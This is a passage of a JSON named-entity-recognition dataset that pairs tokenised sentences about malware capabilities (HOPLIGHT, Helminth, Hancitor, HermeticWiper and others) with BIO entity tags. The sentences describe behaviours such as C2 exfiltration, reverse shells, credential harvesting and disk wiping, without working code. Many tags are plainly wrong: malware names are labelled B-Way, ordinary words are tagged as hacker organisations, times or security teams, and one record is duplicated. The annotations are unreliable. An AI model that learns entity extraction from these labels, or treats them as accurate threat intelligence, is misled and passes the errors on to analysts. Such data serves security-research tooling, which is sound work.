"ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "sent", "system", "information", "and", "files", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "exploited", "Microsoft", "Office", "vulnerabilities", "CVE-2017-11882", "and", "CVE-2018-0802", "to", "deliver", "the", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "the", "ability", "to", "delete", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "HAWKBALL", "has", "leveraged", "several", "Windows", "API", "calls", "to", "create", "processes,", "gather", "disk", "information,", "and", "detect", "debugger", "activity." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "HAWKBALL", "can", "collect", "the", "OS", "version,", "architecture", "information,", "and", "computer", "name." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "can", "collect", "the", "user", "name", "of", "the", "system." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "used", "HTTP", "to", "communicate", "with", "a", "single", "hard-coded", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "created", "a", "cmd.exe", "reverse", "shell,", "executed", "commands,", "and", "uploaded", "output", "via", "the", "command", "line." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HDoor", "kills", "anti-virus", "found", "on", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HDoor", "scans", "to", "identify", "open", "ports", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HELLOKITTY", "can", "use", "an", "embedded", "RSA-2048", "public", "key", "to", "encrypt", "victim", "data", "for", "ransom." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HELLOKITTY", "can", "delete", "volume", "shadow", "copies", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HELLOKITTY", "has", "the", "ability", "to", "enumerate", "network", "resources." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "HELLOKITTY", "can", "search", "for", "specific", "processes", "to", "terminate." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HELLOKITTY", "can", "enumerate", "logical", "drives", "on", "a", "target", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HELLOKITTY", "can", "use", "WMI", "to", "delete", "volume", "shadow", "copies." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HIDEDRV", "injects", "a", "DLL", "for", "Downdelph", "into", "the", "explorer.exe", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "HIDEDRV", "is", "a", "rootkit", "that", "hides", "certain", "operating", "system", "artifacts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "strings", "in", "HOMEFRY", "are", "obfuscated", "with", "XOR", "x56." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOMEFRY", "can", "perform", "credential", "dumping." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "HOMEFRY", "uses", "a", "command-line", "interface." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "can", "enumerate", "device", "drivers", "located", "in", "the", "registry", "at", "`HKLM\\Software\\WBEM\\WDM`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "modified", "the", "firewall", "using", "netsh." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "used", "its", "C2", "channel", "to", "exfiltrate", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Purp" ] }, { "tokens": [ "HOPLIGHT", "has", "multiple", "C2", "channels", "in", "place", "in", "case", "one", "fails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "been", "observed", "enumerating", "system", "drives", "and", "partitions." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "HOPLIGHT", "has", "the", "ability", "to", "connect", "to", "a", "remote", "host", "in", "order", "to", "upload", "and", "download", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "modified", "Managed", "Object", "Format", "(MOF)", "files", "within", "the", "Registry", "to", "run", "specific", "commands", "and", "create", "persistence", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "connected", "outbound", "over", "TCP", "port", "443", "with", "a", "FakeTLS", "method." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "been", "observed", "loading", "several", "APIs", "associated", "with", "Pass", "the", "Hash." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "B-OffAct", "I-Way", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "injected", "into", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "multiple", "proxy", "options", "that", "mask", "traffic", "between", "the", "malware", "and", "the", "remote", "operators." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "B-Purp", "O", "O", "O", "O", "O", "B-Tool", "B-Org" ] }, { "tokens": [ "A", "variant", "of", "HOPLIGHT", "hooks", "lsass.exe,", "and", "lsass.exe", "then", "checks", "the", "Registry", "for", "the", "data", "value", "'rdpproto'", "under", "the", "key", "<code>SYSTEM\\CurrentControlSet\\Control\\Lsa", "Name</code>." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "the", "capability", "to", "harvest", "credentials", "and", "passwords", "from", "the", "SAM", "database." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "used", "svchost.exe", "to", "execute", "a", "malicious", "DLL", "." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "utilized", "Zlib", "compression", "to", "obfuscate", "the", "communications", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "been", "observed", "collecting", "victim", "machine", "information", "like", "OS", "version,", "volume", "information,", "and", "more." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "been", "observed", "collecting", "system", "time", "from", "victim", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "can", "launch", "cmd.exe", "to", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HOPLIGHT", "has", "used", "WMI", "to", "recompile", "the", "Managed", "Object", "Format", "(MOF)", "files", "in", "the", "WMI", "repository." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "HOPLIGHT", "can", "use", "WMI", "event", "subscriptions", "to", "create", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "HTRAN", "can", "inject", "into", "into", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "HTRAN", "can", "proxy", "TCP", "socket", "connections", "to", "obfuscate", "command", "and", "control", "infrastructure." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTRAN", "can", "install", "a", "rootkit", "to", "hide", "network", "connections", "from", "the", "host", "OS." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "abuses", "the", "Windows", "DLL", "load", "order", "by", "using", "a", "legitimate", "Symantec", "anti-virus", "binary,", "VPDN_LU.exe,", "to", "load", "a", "malicious", "DLL", "that", "mimics", "a", "legitimate", "Symantec", "DLL,", "navlu.dll." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "B-SamFile" ] }, { "tokens": [ "HTTPBrowser", "has", "used", "DLL", "side-loading." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HTTPBrowser", "has", "used", "DNS", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "deletes", "its", "original", "installer", "file", "once", "installation", "is", "complete." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "is", "capable", "of", "listing", "files,", "folders,", "and", "drives", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "is", "capable", "of", "writing", "a", "file", "to", "the", "compromised", "system", "from", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "is", "capable", "of", "capturing", "keystrokes", "on", "victims." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "HTTPBrowser's", "installer", "contains", "a", "malicious", "file", "named", "navlu.dll", "to", "decrypt", "and", "run", "the", "RAT.", "navlu.dll", "is", "also", "the", "name", "of", "a", "legitimate", "Symantec", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam" ] }, { "tokens": [ "HTTPBrowser's", "code", "may", "be", "obfuscated", "through", "structured", "exception", "handling", "and", "return-oriented", "programming." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "has", "established", "persistence", "by", "setting", "the", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "key", "value", "for", "<code>wdm</code>", "to", "the", "path", "of", "the", "executable.", "It", "has", "also", "used", "the", "Registry", "entry", "<code>HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "vpdn", "“%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe”</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "has", "used", "HTTP", "and", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "HTTPBrowser", "is", "capable", "of", "spawning", "a", "reverse", "shell", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HUI", "Loader", "can", "be", "deployed", "to", "targeted", "systems", "via", "legitimate", "programs", "that", "are", "vulnerable", "to", "DLL", "search", "order", "hijacking." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "I-Way", "O" ] }, { "tokens": [ "HUI", "Loader", "can", "decrypt", "and", "load", "files", "containing", "malicious", "payloads." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "HUI", "Loader", "has", "the", "ability", "to", "disable", "Windows", "Event", "Tracing", "for", "Windows", "(ETW)", "and", "Antimalware", "Scan", "Interface", "(AMSI)", "functions." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hacking", "Team", "UEFI", "Rootkit", "is", "a", "UEFI", "BIOS", "rootkit", "developed", "by", "the", "company", "Hacking", "Team", "to", "persist", "remote", "access", "software", "on", "some", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hacking", "Team", "UEFI", "Rootkit", "is", "a", "UEFI", "BIOS", "rootkit", "developed", "by", "the", "company", "Hacking", "Team", "to", "persist", "remote", "access", "software", "on", "some", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "decoded", "Base64", "encoded", "URLs", "to", "insert", "a", "recipient’s", "name", "into", "the", "filename", "of", "the", "Word", "document.", "Hancitor", "has", "also", "extracted", "executables", "from", "ZIP", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "O", "B-SamFile", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "deleted", "files", "using", "the", "VBA", "<code>kill</code>", "function." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Hancitor", "has", "the", "ability", "to", "download", "additional", "files", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "used", "malicious", "Microsoft", "Word", "documents,", "sent", "via", "email,", "which", "prompted", "the", "victim", "to", "enable", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-SamFile", "I-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "link", "delivered", "through", "phishing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Hancitor", "has", "used", "<code>CallWindowProc</code>", "and", "<code>EnumResourceTypesA</code>", "to", "interpret", "and", "execute", "shellcode." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "used", "Base64", "to", "encode", "malicious", "links.", "Hancitor", "has", "also", "delivered", "compressed", "payloads", "in", "ZIP", "files", "to", "victims." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "used", "PowerShell", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "added", "Registry", "Run", "keys", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "been", "delivered", "via", "phishing", "emails", "with", "malicious", "attachments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "been", "delivered", "via", "phishing", "emails", "which", "contained", "malicious", "links." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "used", "verclsid.exe", "to", "download", "and", "execute", "a", "malicious", "script." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hancitor", "has", "used", "a", "macro", "to", "check", "that", "an", "ActiveDocument", "shape", "object", "in", "the", "lure", "message", "is", "present.", "If", "this", "object", "is", "not", "found,", "the", "macro", "will", "exit", "without", "downloading", "additional", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Havij", "is", "used", "to", "automate", "SQL", "injection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "A", "Helminth", "VBScript", "receives", "a", "batch", "script", "to", "execute", "a", "set", "of", "commands", "in", "a", "command", "prompt." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "executable", "version", "of", "Helminth", "has", "a", "module", "to", "log", "clipboard", "contents." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "samples", "have", "been", "signed", "with", "legitimate,", "compromised", "code", "signing", "certificates", "owned", "by", "software", "company", "AI", "Squared." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "Helminth", "can", "use", "DNS", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Helminth", "splits", "data", "into", "chunks", "up", "to", "23", "bytes", "and", "sends", "the", "data", "in", "DNS", "queries", "to", "its", "C2", "server." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "has", "checked", "for", "the", "domain", "admin", "group", "and", "Exchange", "Trusted", "Subsystem", "groups", "using", "the", "commands", "<code>net", "group", "Exchange", "Trusted", "Subsystem", "/domain</code>", "and", "<code>net", "group", "domain", "admins", "/domain</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Helminth", "config", "file", "is", "encrypted", "with", "RC4." ], "ner_tags": [ "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "can", "download", "additional", "files." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "The", "executable", "version", "of", "Helminth", "has", "a", "module", "to", "log", "keystrokes." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "creates", "folders", "to", "store", "output", "from", "batch", "scripts", "prior", "to", "sending", "the", "information", "to", "its", "C2", "server." ], "ner_tags": [ "B-Way", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "has", "checked", "the", "local", "administrators", "group." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "version", "of", "Helminth", "uses", "a", "PowerShell", "script." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Helminth", "has", "used", "Tasklist", "to", "get", "information", "on", "processes." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "establishes", "persistence", "by", "creating", "a", "shortcut", "in", "the", "Start", "Menu", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Helminth", "has", "used", "a", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "establishes", "persistence", "by", "creating", "a", "shortcut." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C2", "over", "HTTP,", "Helminth", "encodes", "data", "with", "base64", "and", "sends", "it", "via", "the", "\"Cookie\"", "field", "of", "HTTP", "requests.", "For", "C2", "over", "DNS,", "Helminth", "converts", "ASCII", "characters", "into", "their", "hexadecimal", "values", "and", "sends", "the", "data", "in", "cleartext." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "encrypts", "data", "sent", "to", "its", "C2", "server", "over", "HTTP", "with", "RC4." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "version", "of", "Helminth", "consists", "of", "VBScript", "scripts." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Helminth", "can", "use", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Helminth", "can", "provide", "a", "remote", "shell.", "One", "version", "of", "Helminth", "uses", "batch", "scripting." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "B-Tool" ] }, { "tokens": [ "HermeticWiper", "can", "use", "`AdjustTokenPrivileges`", "to", "grant", "itself", "privileges", "for", "debugging", "with", "`SeDebugPrivilege`,", "creating", "backups", "with", "`SeBackupPrivilege`,", "loading", "drivers", "with", "`SeLoadDriverPrivilege`,", "and", "shutting", "down", "a", "local", "system", "with", "`SeShutdownPrivilege`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "overwrite", "the", "`C:\\Windows\\System32\\winevt\\Logs`", "file", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "HermeticWiper", "executable", "has", "been", "signed", "with", "a", "legitimate", "certificate", "issued", "to", "Hermetica", "Digital", "Ltd." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "recursively", "wipe", "folders", "and", "files", "in", "`Windows`,", "`Program", "Files`,", "`Program", "Files(x86)`,", "`PerfLogs`,", "`Boot,", "System`,", "`Volume", "Information`,", "and", "`AppData`", "folders", "using", "`FSCTL_MOVE_FILE`.", "HermeticWiper", "can", "also", "overwrite", "symbolic", "links", "and", "big", "files", "in", "`My", "Documents`", "and", "on", "the", "Desktop", "with", "random", "bytes." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "decompress", "and", "copy", "driver", "files", "using", "`LZCopy`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "corrupt", "disk", "partitions", "and", "obtain", "raw", "disk", "access", "to", "destroy", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "corrupt", "disk", "partitions,", "damage", "the", "Master", "Boot", "Record", "(MBR),", "and", "overwrite", "the", "Master", "File", "Table", "(MFT)", "of", "all", "available", "physical", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "compress", "32-bit", "and", "64-bit", "driver", "files", "with", "the", "Lempel-Ziv", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "overwrite", "its", "own", "file", "with", "random", "bites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "enumerate", "common", "folders", "such", "as", "My", "Documents,", "Desktop,", "and", "AppData." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "deploy", "through", "an", "infected", "system's", "default", "domain", "policy." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "set", "the", "`HKLM:\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl\\CrashDumpEnabled`", "Registry", "key", "to", "`0`", "in", "order", "to", "disable", "crash", "dumps." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "disable", "pop-up", "information", "about", "folders", "and", "desktop", "items", "and", "delete", "Registry", "keys", "to", "hide", "malicious", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "disable", "the", "VSS", "service", "on", "a", "compromised", "host", "using", "the", "service", "control", "manager." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "HermeticWiper", "has", "used", "the", "name", "`postgressql.exe`", "to", "mask", "a", "malicious", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "modify", "Registry", "keys", "to", "disable", "crash", "dumps,", "colors", "for", "compressed", "files,", "and", "pop-up", "information", "about", "folders", "and", "desktop", "items." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", 